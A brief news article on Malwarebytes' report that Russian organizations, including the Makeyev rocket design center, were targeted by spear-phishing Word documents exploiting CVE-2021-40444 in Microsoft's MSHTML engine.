Russian Defense Contractor Targeted via New MHTML Vulnerability

By Riley ThompsonTechnology News

Russian Defense Contractor Targeted in Cyberattack Exploiting Recent MHTML Vulnerability

Cybersecurity company Malwarebytes has reported that Russian organizations, including a major defense contractor, have become targets of cyber-espionage attacks leveraging a recently patched vulnerability in MHTML.

Attack Details

Researchers state that one of the targets was JSC “State Rocket Center named after Academician V. P. Makeyev” (JSC “Makeyev SRC”), a Russian developer of submarine-launched ballistic missiles and one of the country’s largest scientific and design centers for rocket and space technology.

The attacks followed a classic spear-phishing pattern: employees received emails containing malicious Office documents. The lures appeared as Word files, allegedly created by the company’s HR department. Employees were asked to fill out a form and send it back to HR or reply to the email.

“When the recipient decides to fill out the form, they are prompted to enable editing. That’s all it takes to trigger the exploit,” the experts explain.

Exploited Vulnerability

The attackers exploited CVE-2021-40444, a zero-day bug in Microsoft MHTML (also known as Trident), the proprietary engine behind Internet Explorer. This vulnerability can be used via Office files to execute malicious code on unprotected Windows systems. Previously, it was reported that this issue was already being used in real-world attacks against Office 365 and Office 2019 users on Windows 10. Soon after, public and easy-to-use exploits for this vulnerability became available. A patch for the vulnerability has since been released.

Other Observed Attacks

Researchers also discovered other Office documents containing the same exploit, but these lures were crafted to appear as if they were from the Ministry of Internal Affairs and disguised as fines for “illegal offenses.” Malwarebytes notes that they were unable to link these documents to specific targets.

It is believed that these attacks are being carried out by “government-backed” hackers from an unidentified country.

Source

  • Malwarebytes

Leave a Reply